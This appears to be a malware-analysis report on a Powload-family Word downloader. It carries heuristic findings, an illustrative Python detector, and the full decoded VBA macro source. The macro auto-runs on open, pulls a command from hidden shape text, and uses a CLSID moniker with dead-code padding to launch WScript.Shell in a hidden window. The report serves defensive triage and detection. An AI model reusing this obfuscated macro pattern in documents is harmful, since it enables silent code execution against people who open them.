Verdict: MALICIOUS (risk score 212)
MITRE ATT&CK
- T1059.001 PowerShell
- T1566.001 Spearphishing Attachment
- T1204.002 Malicious File

Malware Insights
The sample is a malicious Word document carrying a VBA macro. Its 'Document_open' procedure runs as soon as the document is opened with macros enabled and starts with 'On Error Resume Next', so no run-time error in the surrounding code can interrupt it. The procedure does four things of interest: it assembles a command string from the text of a shape in the document ('Shapes("vDjCnCQojnJjw").TextFrame.TextRange.Text'), it creates a COM object with 'GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8")', which is the CLSID of WScript.Shell reached through a moniker so that the string "WScript.Shell" never appears in the source, it declares 'Const lRnGU = 0', and it calls 'qSBYKLUwh.Run!(UOFIPPsUjD, lRnGU)', i.e. WScript.Shell.Run with window style 0 (hidden). The arithmetic expressions and Select Case blocks between these statements are dead-code padding. The decoded macro source itself contains no PowerShell string and no URL: the 'Reference to PowerShell' heuristic and the ClamAV classification Doc.Downloader.Powload indicate that the command text lives elsewhere in the document, most plausibly in the shape text the macro reads at run time, and that it downloads and executes a second-stage payload, the usual PowerShell-downloader delivery pattern. Recovering the actual command line and download URL therefore requires extracting the shape text from the document, not only the macro module.
Heuristics (8)

- ClamAV: Doc.Downloader.Powload-6826397-0 [critical, CLAMAV_DETECTION]. ClamAV detected this file as malware: Doc.Downloader.Powload-6826397-0. The family name identifies a PowerShell-based downloader document.
- Reference to PowerShell [high, SC_STR_POWERSHELL]. No matched line is reported in the macro source, and the decoded source below contains no PowerShell string; the match comes from elsewhere in the document, most plausibly the shape text the macro reads.
- VBA macros detected [medium, OLE_VBA_MACROS; 3 related findings]. Document contains VBA macro code.
- GetObject call [high, OLE_VBA_GETOBJ]. Matched lines in script:
    End Select
    Set qSBYKLUwh = CVar(GetObject(hQRkQVKAE + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + QHNQfi))
    On Error Resume Next
  The "new:" moniker makes GetObject instantiate a COM class by CLSID; 72C24DD5-D70A-438B-8A42-98424B88AFB8 is WScript.Shell. This sidesteps the literal "WScript.Shell" that CreateObject-based macros expose to string scanners. The object is later used in qSBYKLUwh.Run!(UOFIPPsUjD, lRnGU) with lRnGU declared as Const 0, so the command runs in a hidden window.
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]. The compiled VBA (p-code) stream contains an auto-execution token together with shell, download or object-execution tokens. This check catches p-code-only macro documents and cases where source extraction fails, where no visible source is available to scan.
- Document_Open macro [low, OLE_VBA_DOCOPEN]. Matched lines in script:
    Attribute VB_Customizable = True
    Private Sub Document_open()
    On Error Resume Next
  Document_Open runs automatically when the document is opened with macros enabled; On Error Resume Next suppresses every run-time error so the padding code cannot break the payload path.
- Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]. One or more files extracted from inside this sample matched static suspicious-content checks (script obfuscation, encoded payload blobs, packed data, or execution/download terms). Here that file is macros.bas, listed under Extracted artifacts.
- Embedded URL [info, EMBEDDED_URL]. One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label says which channel (macro, JS, link annotation, document body, ...) reached it.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
  This is the DrawingML XML namespace URI present in every Office Open XML document, not a download location; the payload URL is not visible in the extracted material.
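As an added example (not part of the analyzer's report or of the sample's own code), the Python below runs the checks the heuristics above describe over an excerpt of this page's macro: it finds the auto-exec entry point, resolves the "new:" CLSID moniker against a small table of well-known classes, detects the command text being assembled from a shape, resolves the Run window-style constant, and scores identifier names for mangling. The two CLSID table entries are the real WScript.Shell and Shell.Application CLSIDs; the randomness thresholds, the keyword list and the function names are assumptions made for this illustration, not the analyzer's rules.

```python
import re

# Excerpt of the macro extracted from the sample on this page: the live
# statements plus one line of arithmetic filler (the other filler blocks
# are omitted in this excerpt).
MACRO_EXCERPT = '''Attribute VB_Name = "NFEaPVQU"
Private Sub Document_open()
On Error Resume Next
KYfWwkB = (pjtTN - Oct(kdCjHGz) * nGdiRlhXE - Sgn(18409089) - 208689627 + Fix(izwBHS) + 465697549 + 234248164 / 143817271 / BDLRw)
Set pHjwTS = Shapes("vDjCnCQojnJjw")
UOFIPPsUjD = "" + drjQWmfi + pvzuw + pHjwTS.TextFrame.TextRange.Text + aLhIiwLL + MKbLhjX + IjEdJZ + pjiFzb + szlusV
Set qSBYKLUwh = CVar(GetObject(hQRkQVKAE + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + QHNQfi))
Const lRnGU = 0
nCGOf = Array(vzavU, qSBYKLUwh.Run!(UOFIPPsUjD, lRnGU), MCTiMdcCi)
End Sub
'''

# Well-known CLSIDs that appear behind "new:" monikers in maldocs.
KNOWN_CLSIDS = {
    "72C24DD5-D70A-438B-8A42-98424B88AFB8": "WScript.Shell",
    "13709620-C279-11CE-A49E-444553540000": "Shell.Application",
}
# Keywords and built-ins left out of the identifier statistics (partial list).
VBA_BUILTINS = {
    "Attribute", "Private", "Public", "Sub", "Function", "End", "On", "Error", "Resume",
    "Next", "Select", "Case", "Set", "Const", "Dim", "As", "If", "Then", "Else", "For", "To",
    "True", "False", "Array", "Oct", "Sgn", "Fix", "Int", "Hex", "CLng", "CStr", "CByte",
    "CVar", "GetObject", "Shapes", "TextFrame", "TextRange", "Text", "Run",
}
AUTO_EXEC = re.compile(r"\bSub\s+(Document_Open|AutoOpen|Auto_Open|Workbook_Open|AutoExec)\b", re.I)
CLSID_MONIKER = re.compile(r"new:([0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12})")
SHAPE_READ = re.compile(r'Shapes\("([^"]+)"\)')
SHELL_RUN = re.compile(r"\.Run!?\s*\(\s*[A-Za-z_]\w*\s*,\s*([A-Za-z_]\w*|\d+)\s*\)")  # .Run(cmd, windowStyle)
CONST_DEF = re.compile(r"\bConst\s+([A-Za-z_]\w*)\s*=\s*(\d+)")
IDENT = re.compile(r"\b[A-Za-z_]\w*\b")
VOWELS = set("aeiouAEIOU")


def looks_random(name):
    """Assumed name-mangling heuristic: CamelCase words such as TextFrame pass; mostly-uppercase
    mixed-case names, four or more case segments, or a vowel-starved segment of 4+ letters fail."""
    letters = [c for c in name if c.isalpha()]
    if len(letters) < 5:
        return False
    upper = sum(c.isupper() for c in letters)
    if upper != len(letters) and upper > len(letters) / 2:
        return True
    segments, cur = [], letters[0]
    for prev, c in zip(letters, letters[1:]):
        if prev.islower() and c.isupper():   # CamelCase word boundary
            segments.append(cur)
            cur = c
        else:
            cur += c
    segments.append(cur)
    if len(segments) >= 4:
        return True
    return any(len(s) >= 4 and sum(ch in VOWELS for ch in s) / len(s) < 0.25
               for s in segments)


def scan_vba(source):
    """Return the triage findings for one decoded VBA module."""
    # Attribute lines and string literals are not code: drop them for identifier statistics,
    # but keep the raw source for the CLSID and shape-name lookups (both sit inside strings).
    code = "\n".join(ln for ln in source.splitlines() if not ln.startswith("Attribute "))
    code = re.sub(r'"[^"]*"', '""', code)
    consts = {k: int(v) for k, v in CONST_DEF.findall(code)}
    run = SHELL_RUN.search(code)
    window_style = None
    if run:
        arg = run.group(1)
        window_style = int(arg) if arg.isdigit() else consts.get(arg)
    idents = {i for i in IDENT.findall(code) if i not in VBA_BUILTINS}
    return {
        "auto_exec": [m.group(1) for m in AUTO_EXEC.finditer(code)],
        "clsid_monikers": [(c.upper(), KNOWN_CLSIDS.get(c.upper(), "unknown"))
                           for c in CLSID_MONIKER.findall(source)],
        "shape_reads": SHAPE_READ.findall(source) if ".TextFrame.TextRange.Text" in source else [],
        "run_window_style": window_style,
        "identifier_count": len(idents),
        "mangled": sorted(i for i in idents if looks_random(i)),
    }


def verdict(findings):
    """Reasons a reviewer would list; empty for a module with none of the traits."""
    reasons = []
    if findings["auto_exec"]:
        reasons.append("auto-exec entry point: " + ", ".join(findings["auto_exec"]))
    for clsid, name in findings["clsid_monikers"]:
        reasons.append(f"GetObject new: moniker {clsid} ({name})")
    if findings["shape_reads"]:
        reasons.append("command text read from shape(s): " + ", ".join(findings["shape_reads"]))
    if findings["run_window_style"] == 0:
        reasons.append("shell Run with window style 0 (hidden window)")
    n, total = len(findings["mangled"]), findings["identifier_count"]
    if total and n / total > 0.5:
        reasons.append(f"{n} of {total} identifiers look randomly generated")
    return reasons


if __name__ == "__main__":
    print(*verdict(scan_vba(MACRO_EXCERPT)), sep="\n")
```

On the excerpt this reports all five traits, with 16 of 23 identifiers scored as generated; run over the full macros.bas the same ratio is what the analyzer's 132-of-200 figure expresses. The keyword list matters: VBA built-ins such as CByte are vowel-starved and would otherwise be counted as mangled, which is why the scan excludes them before scoring.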
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7860 bytes |

SHA-256: c19c6308e8f18a5f13c67761ad20f2e57b762121beea19605bf38e9fb86a17d1

Detection for macros.bas:
- ClamAV: no threats found. The Doc.Downloader.Powload signature above fired on the document itself, not on the decoded macro text, so a clean scan of the extracted source does not weaken the verdict.
- Obfuscation or payload: likely. 132 of 200 identifiers look randomly generated (e.g. 'vDjCnCQojnJjw'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "NFEaPVQU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
KYfWwkB = (pjtTN - Oct(kdCjHGz) * nGdiRlhXE - Sgn(18409089) - 208689627 + Fix(izwBHS) + 465697549 + 234248164 / 143817271 / BDLRw)
Select Case pdGpW
Case 79979582
YsOTPaRi = CLng(279694727)
zwnfAcoz = Int(cmEaXz)
Case 254601901
iawqtSL = Hex(165777637)
twrJE = CStr(144186037 * CByte(PNVKao))
End Select
Set pHjwTS = Shapes("vDjCnCQojnJjw")
On Error Resume Next
biITjW = (GurUHnW - Oct(aLjjNOJAi) * dcojsHtwd - Sgn(332256764) - 162030324 + Fix(IZzjOZ) + 3240303859# + 206458778 / 6301701 / bNzkbzk)
Select Case SiiaGunXC
Case 236301552
IKXWGDG = CLng(226176585)
zkDzsGA = Int(kHfwOjj)
Case 278251514
hTDvrXNEs = Hex(83161682)
qshUO = CStr(38795894 * CByte(hfiizuMmu))
End Select
On Error Resume Next
SchBKhaIh = (BwofQvRtP - Oct(AhKuv) * zcrzm - Sgn(294975674) - 210871166 + Fix(GCTkYfiiU) + 2714993499# + 82359708 / 81731405 / lBWrwTTw)
Select Case RnGIiwRh
Case 23649760
SrZNc = CLng(217696402)
jWSMVh = Int(UNbUHnYM)
Case 4032502
kjiQwjR = Hex(252999247)
DuqMnuKi = CStr(236230833 * CByte(iYvFXnUXw))
End Select
UOFIPPsUjD = "" + drjQWmfi + pvzuw + pHjwTS.TextFrame.TextRange.Text + aLhIiwLL + MKbLhjX + IjEdJZ + pjiFzb + szlusV
On Error Resume Next
NBdEOzABP = (cGDLqsaPt - Oct(WQkuaOlMG) * MPjUzGjEC - Sgn(190578294) - 73952580 + Fix(EquhLBht) + 718497759 + 298000541 / 131006691 / XzRjdANou)
Select Case mNXiOjL
Case 144133493
QikMtA = CLng(300905398)
kiNhT = Int(szApzaBOX)
Case 288079322
DjJdmzhp = Hex(209025790)
MmkXj = CStr(237851761 * CByte(dJhpSSflO))
End Select
On Error Resume Next
Czfawaw = (BEHQtio - Oct(FFhYd) * wTqcQK - Sgn(245320630) - 327782553 + Fix(jElHtGnfR) + 1709588929 + 181731513 / 118185073 / NlKLRcKu)
Select Case IwqzLkWJo
Case 280654779
OaMIb = CLng(307529843)
RaPwBuJGF = Int(FsJnwq)
Case 314665177
QuuDJHlk = Hex(96335752)
mYCkWdt = CStr(132577626 * CByte(JwwpEfF))
End Select
Set qSBYKLUwh = CVar(GetObject(hQRkQVKAE + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + QHNQfi))
On Error Resume Next
NjYQYiv = (GPZwp - Oct(DwEZO) * PBcTid - Sgn(11990677) - 233566723 + Fix(KoqNYSj) + 2294078649# + 132884139 / 171700976 / oZuGQ)
Select Case pVmzJQw
Case 252623661
LEEiv = CLng(212433117)
awaijQ = Int(TNkzGiqGV)
Case 23358256
njwaA = Hex(162204859)
bQGfdlibc = CStr(336215855 * CByte(jhoZdTlZQ))
End Select
On Error Resume Next
fNMqsjkz = (fGMQbtaTo - Oct(QwjMw) * VREIEwuJ - Sgn(342163292) - 300389076 + Fix(tpDqTEm) + 1354189539 + 332150914 / 141616368 / tjRJQBFj)
Select Case ANFXRfrpj
Case 78371194
QiRhi = CLng(247949941)
wswsAP = Int(YUquftDQ)
Case 327187558
fkfYnMz = Hex(247333747)
SXKSkffo = CStr(61148496 * CByte(zINpptLAu))
End Select
On Error Resume Next
tNiRiS = (mWffN - Oct(zVhlkiBT) * CjoBXi - Sgn(322803983) - 256978113 + Fix(UJHno) + 2759832069# + 120809858 / 22369160 / YVoWEavLR)
Select Case puvPucLz
Case 190793277
vWpjdLE = CLng(216866554)
jrTjpc = Int(dffOGLRMz)
Case 53946337
tMLdqpa = Hex(323766170)
jEtsW = CStr(93198004 * CByte(ktWNG))
End Select
On Error Resume Next
jarfBavNH = (zsfCtvl - Oct(Ttroz) * qHmzCnrE - Sgn(76416639) - 202938151 + Fix(nLwoBMmL) + 1693898679 + 25029000 / 29751718 / Kdjcqjkzs)
Select Case HounwKT
Case 224495994
jAOGjmVRh = CLng(32095964)
ZjmKcUW = Int(BUbfwM)
Case 30351874
uNNbsr = Hex(71828591)
wvWwpUR = CStr(17072211 * CByte(PAaBjLdnI))
End Select
On Error Resume Next
LuAht = (HOLfauhWd - Oct(XKKaTDE) * GdCAfdOE - Sgn(90395446) - 210101980 + Fix(wKzZinFv) + 2387458839# + 252634217 / 20016333 / EbnasJwnH)
Select Case NbPpGiiRV
Case 213026766
qfPXk = CLng(179210773)
NITADnwZ = Int(CWvPsYIwY)
Case 65201718
jWMTQWoNw = Hex(155373273)
HiLZz = CStr(143564302 * CByte(Ycqhqj))
End Select
Const lRnGU = 0
On Error Resume Next
uiCNE = (mXkzPJf - Oct(uYtcnn) * YfbFtOz - Sgn(111607547) - 116972739 + Fix(MzTSZ) + 2074257199 + 47617103 / 105793496 / nEzlKqUrF)
Select Case GQqriVz
Case 182627203
KLpGS = CLng(326945963)
JMBVs = Int(MpAVbtQP)
Case 165467083
rnLlVIl = Hex(320532509)
DzFlwwi = CStr(260415652 * CByte(jIpkk))
End Select
On Error Resume Next
qMlIkPDJo = (piAXlNIzd - Oct(RhktR) * XHIjW - Sgn(182931522) - 252636730 + Fix(jfsiiWmId) + 3172426569# + 28807038 / 208257873 / JMDYVJLc)
Select Case brrfs
Case 321366671
HbNvJ = CLng(260908676)
UZOHS = Int(EoplR)
Case 86875087
EIARbOaDA = Hex(283875126)
dpHVU = CStr(281732762 * CByte(dWGjwHCs))
End Select
On Error Resume Next
AfWbbihko = (hzwoqvzCJ - Oct(HqQPiM) * CBawflHB - Sgn(285864586) - 178910948 + Fix(hDiwSHK) + 2402998029# + 156597170 / 188979061 / HVqzAoJP)
Select Case zPvij
Case 91986475
BLpnwUUUG = CLng(248052326)
YJFtoH = Int(uFFilSs)
Case 185490608
hSIENE = Hex(51411148)
Zhpjm = CStr(7498568 * CByte(rOdkGBD))
End Select
On Error Resume Next
UujiQE = (iUWXh - Oct(KcCin) * jIJcn - Sgn(174657452) - 164205528 + Fix(HVvWZUpO) + 3218871609# + 276931549 / 71237545 / RPvXwWrrE)
Select Case wbHLGF
Case 73921951
tDrRwN = CLng(162996569)
wMOvfMXvi = Int(NmdQjh)
Case 228897061
ZTONOkDfw = Hex(46471209)
zSiww = CStr(160062621 * CByte(cJhjEMc))
End Select
nCGOf = Array(vzavU, qSBYKLUwh.Run!(UOFIPPsUjD, lRnGU), MCTiMdcCi)
On Error Resume Next
wwMoaEhzp = (FwudzL - Oct(QkPNwiLXN) * viPlFL - Sgn(197009487) - 275242172 + Fix(TpLXGRnK) + 1685054929 + 67575368 / 116969758 / KkjpHRmAT)
Select Case RMllP
Case 170681575
zlQnSrAE = CLng(85117538)
vJUlN = Int(Zlwivwtrp)
Case 89128625
YwlVCN = Hex(178469286)
YBFrsjl = CStr(306364199 * CByte(qrzQD))
End Select
On Error Resume Next
mEhkF = (wpSjAzujM - Oct(ZkfNO) * kTSuRWu - Sgn(180357933) - 164351423 + Fix(tARWH) + 1961665649 + 137833872 / 316536130 / qURqnaRL)
Select Case PFhMoKT
Case 93918640
LccvqH = CLng(287082227)
tOpCw = Int(jfYISd)
Case 206083779
AKZMTb = Hex(213773508)
HCtMJU = CStr(36544418 * CByte(dKwijDWTT))
End Select
On Error Resume Next
jjhHm = (sGpEidP - Oct(LlZmBlBI) * XmEfnwmo - Sgn(5961812) - 36158181 + Fix(JtwrIiJBl) + 860484459 + 90123145 / 67957502 / OJwlM)
Select Case zIavKVisF
Case 70160032
QdXTb = CLng(120924496)
hdScAXbJ = Int(vQdzAbF)
Case 51792594
jwmVaqDq = Hex(222072795)
jmpnrIDjc = CStr(140096437 * CByte(CTAtn))
End Select
End Sub